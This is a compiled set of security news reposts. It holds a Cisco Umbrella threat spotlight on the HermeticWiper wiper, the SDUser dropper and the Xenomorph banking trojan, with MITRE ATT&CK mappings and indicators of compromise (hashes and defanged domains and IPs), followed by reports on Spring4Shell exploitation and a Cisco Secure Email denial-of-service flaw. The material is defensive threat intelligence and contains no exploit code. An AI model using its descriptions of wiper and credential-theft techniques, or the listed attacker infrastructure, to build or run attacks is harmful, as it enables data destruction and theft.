This has been a busy month for cyber attackers, and the Cisco Umbrella team – in conjunction with Cisco Talos – has observed several new threats for users to be aware of.

In this month’s edition of the Cybersecurity Threat Spotlight, we discuss a wiper making its way through Ukraine, a dropper targeting India and China, and a newly discovered Trojan targeting EU banks.

Want to see Cisco Umbrella in action? Sign up for a free trial today!

HermeticWiper

Threat Type: Wiper

Attack Chain:

Description: HermeticWiper is a data destructing malware observed in attacks targeting Ukraine. This wiper comes as a small executable with a valid digital signature issued to “Hermetica Digital Ltd.” The malware leverages embedded resources to interact with storage devices present on infected systems. The applicable embedded driver is extracted, loaded into the wiper’s process memory space, decompressed, and written to the disk before the wipe process. The wiper disables the generation of crash dumps and corrupts the first 512 bytes to destroy the MBR of physical drives. For partitions, it disables the Volume Shadow Copy Service and uses different destructive mechanisms on the partitions depending on whether they’re FAT type or NTFS type. The wiper also attempts to corrupt housekeeping files. During the final stage, HermeticWiper waits for all sleeping threads to complete and initiates a reboot to ensure the success of the wiping activity.

HermeticWiper Spotlight: Cisco Talos has become aware of a series of wiper attacks going on inside Ukraine. One of the wipers used in these attacks has been dubbed “HermeticWiper.” Deployment of this destructive malware began on February 23, 2022. The malware has two components designed for destruction: one targeting the Master Boot Record (MBR) and another targeting partitions.

Target Geolocations: Ukraine
Target Data: Physical Drivers, Partitions
Target Businesses: Government Sector
Exploits: N/A

Mitre ATT&CK for HermeticWiper

Initial Access:
Valid Accounts

Discovery:
System Information Discovery
File and Directory Discovery

Persistence:
Create or Modify System Process: Windows Service

Execution:
Native API

Evasion:
Modify Registry

Impact:
Disk Wipe: Disk Structure Wipe
Inhibit System Recovery
Service Stop
System Shutdown/Reboot

Privilege Escalation:
Access Token Manipulation

IOCs¹

Hashes:
0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da
1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591
2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf
3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767

Additional Information
Threat Advisory: Hermetic Wiper

Which Cisco Secure Products Can Block
Cisco Secure Endpoint
Cisco Secure Email
Cisco Secure Firewall/Secure IPS
Cisco Secure Malware Analytics
Cisco Umbrella

SDUser

Threat Type: Dropper

Attack Chain:

Description: SDUser is a VBA-based dropper that is used by Advanced Persistent Threat (APT) groups. The functionality of the payload includes command and control protocol, anti-sandboxing techniques, and a reverse shell mechanism.

SDUser Spotlight: In June 2021, Cisco Talos researchers discovered a malicious Excel spreadsheet that attempted to drop a previously unknown RAT. A month later, they discovered another closely related spreadsheet. These samples were internally referred to as “SDUser” sampled due to the specific PDB string left in the binary payload.

More recent analysis shows similar code being used by two different APT groups: Transparent Tribe, which targets organizations in India, and Donut, which targets organizations in Pakistan and China. These two different threat actors may use code from the same source in their attacks, which means that their attacks would display similarities despite being conducted by different groups. Code reuse, adopting techniques from successful attacks, and deliberate integration of evidence designed to fool analysts can disguise the true perpetrator and lead to these attacks being attributed to different groups.

Target Geolocations: Pakistan, China
Target Data: User Credentials, Browser Data, Sensitive Information
Target Businesses: Any
Exploits: N/A

Mitre ATT&CK for SDUser

Initial Access:
Phishing: Spearphishing Attachment

Discovery:
Peripheral Device Discovery
Query Registry

Execution:
Command and Scripting Interpreter

Evasion:
Obfuscated Files or Information
Virtualization/Sandbox Evasion: System Checks

Command and Control:
Application Layer Protocol
Web Service

IOCs¹

Domains:
microsoft-updates[.]servehttp[.]com
microsoft-patches[.]servehttp[.]com
microsoft-docs[.]myftp[.]org

IPs:
45.153.240[.]66
46.30.188[.]222

Additional Information:
What’s with the shared VBA code between Transparent Tribe and other threat actors?

Which Cisco Secure Products Can Block:
Cisco Secure Endpoint
Cisco Secure Email
Cisco Secure Firewall/Secure IPS
Cisco Secure Malware Analytics
Cisco Umbrella
Cisco Secure Web Appliance

Xenomorph

Threat Type: Mobile Trojan

Attack Chain:

Description: Xenomorph is an Android Banking Trojan. It is capable of stealing credentials via overlay attack, and it uses SMS and notification interception to log and use potential 2FA tokens. Stolen data is sent to the C2 for further exploitation.

Xenomorph Spotlight: Xenomorph was initially discovered in February 2022. It is distributed through the official Google Play Store. It targets users of 56 different European banks and cryptocurrency wallets. Capabilities include – but are not limited to – stealing credentials, SMS and notification interception, excessive logging, and data exfiltration. The core engine is designed as a modular system and still appears to be in the development stage. Malware heavily relies on the overlay attack mechanism to steal personally identifiable information (PII) and other sensitive data. Collected data is exfiltrated to an attacker-controlled server using the open-source project RetroFit2.

Target Geolocations: EU
Target Data: User Credentials, Browser Data, Sensitive Information
Target Businesses: Any
Exploits: N/A

Mitre ATT&CK for Xenomorph

Initial Access:
Deliver Malicious App via Authorized App Store

Execution:
Native Code

Evasion:
Masquerading as Legitimate Application

Credential Access:
Capture SMS Messages
Input Capture

Command and Control:
Standard Application Layer Protocol

Exfiltration:
Data Encryption
Standard Application Layer Protocol

IOCs¹

Domains:
simpleyo5[.]tk
simpleyo5[.]cf
art12sec[.]ga
kart12sec[.]gq
homeandofficedeal[.]com

Additional Information:
Xenomorph: A newly hatched Banking Trojan

Which Cisco Secure Products Can Block
Cisco Secure Firewall/Secure IPS
Cisco Secure Malware Analytics
Cisco Umbrella
Cisco Secure Web Appliance

Source :
https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-hermeticwiper-sduser-xenomorph

CISA Warns of Active Exploitation of Critical Spring4Shell Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added the recently disclosed remote code execution (RCE) vulnerability affecting the Spring Framework, to its Known Exploited Vulnerabilities Catalog based on “evidence of active exploitation.”

The critical severity flaw, assigned the identifier CVE-2022-22965 (CVSS score: 9.8) and dubbed “Spring4Shell”, impacts Spring model–view–controller (MVC) and Spring WebFlux applications running on Java Development Kit 9 and later.

“Exploitation requires an endpoint with DataBinder enabled (e.g., a POST request that decodes data from the request body automatically) and depends heavily on the servlet container for the application,” Praetorian researchers Anthony Weems and Dallas Kaman noted last week.

Although exact details of in-the-wild abuse remain unclear, information security company SecurityScorecard said “active scanning for this vulnerability has been observed coming from the usual suspects like Russian and Chinese IP space.”

Similar scanning activities have been spotted by Akamai and Palo Alto Networks’ Unit42, with the attempts leading to the deployment of a web shell for backdoor access and to execute arbitrary commands on the server with the goal of delivering other malware or spreading within the target network.

“During the first four days after the vulnerability outbreak, 16% of the organizations worldwide were impacted by exploitation attempts,” Check Point Research said, adding it detected 37,000 Spring4Shell-related attacks over the weekend.

Microsoft 365 Defender Threat Intelligence Team also chimed in, stating it has been “tracking a low volume of exploit attempts across our cloud services for Spring Cloud and Spring Core vulnerabilities.”

According to statistics released by Sonatype, potentially vulnerable versions of the Spring Framework account for 81% of the total downloads from Maven Central repository since the issue came to light on March 31.

Cisco, which is actively investigating its line-up to determine which of them may be impacted by the vulnerability, confirmed that three of its products are affected –

Cisco Crosswork Optimization Engine
Cisco Crosswork Zero Touch Provisioning (ZTP), and
Cisco Edge Intelligence

VMware, for its part, also has deemed three of its products as vulnerable, offering patches and workarounds where applicable –

VMware Tanzu Application Service for VMs
VMware Tanzu Operations Manager, and
VMware Tanzu Kubernetes Grid Integrated Edition (TKGI)

“A malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system,” VMware said in the advisory.

Also added by CISA to the catalog are two zero-day flaws patched by Apple last week (CVE-2022-22674 and CVE-2022-22675) and a critical shortcoming in D-Link routers (CVE-2021-45382) that has been actively weaponized by the Beastmode Mirai-based DDoS campaign.

Pursuant to the Binding Operational Directive (BOD) issued by CISA in November 2021, Federal Civilian Executive Branch (FCEB) agencies are required to remediate the identified vulnerabilities by April 25, 2022.

Source :
https://thehackernews.com/2022/04/cisa-warns-of-active-exploitation-of.html

Hackers can crash Cisco Secure Email gateways using malicious emails

Cisco has addressed a high severity vulnerability that could allow remote attackers to crash Cisco Secure Email appliances using maliciously crafted email messages.

The security flaw (tracked as CVE-2022-20653) was found in DNS-based Authentication of Named Entities (DANE), a Cisco AsyncOS Software component used by Cisco Secure Email to check emails for spam, phishing, malware, and other threats.

This bug is due to an insufficient error handling issue in DNS name resolution found and reported to Cisco by Rijksoverheid Dienst ICT Uitvoering (DICTU) security researchers.

“An attacker could exploit this vulnerability by sending specially formatted email messages that are processed by an affected device,” Cisco explained.

“A successful exploit could allow the attacker to cause the device to become unreachable from management interfaces or to process additional email messages for a period of time until the device recovers, resulting in a DoS [Denial-of-Service] condition.”

To make things even worse, continued attacks can cause the targeted devices to become completely unavailable, which results in a persistent DoS condition.

The company’s Product Security Incident Response Team (PSIRT) said that it found no evidence of malicious exploitation in the wild before the security advisory was published on Wednesday.

Vulnerable component not enabled by default

While the security vulnerability can be exploited remotely by unauthenticated attackers, Cisco says the vulnerable DANE email verification component is not enabled by default.

Admins can check if DANE is configured by going to the Mail Policies > Destination Controls > Add Destination web UI page and confirming whether the DANE Support option is toggled on.

Cisco has also confirmed that CVE-2022-20653 does not impact Web Security Appliance (WSA) and Secure Email and Web Manager or devices without the DANE feature enabled.

The company also provided a workaround requiring customers to configure bounce messages from Cisco ESA instead of from downstream dependent mail servers to block exploitation attempts.

Earlier this month, Cisco patched several maximum severity flaws with proof-of-concept exploit code available that would enable threat actors to take control of Small Business RV Series routers without authentication.

Source :
https://www.bleepingcomputer.com/news/security/hackers-can-crash-cisco-secure-email-gateways-using-malicious-emails/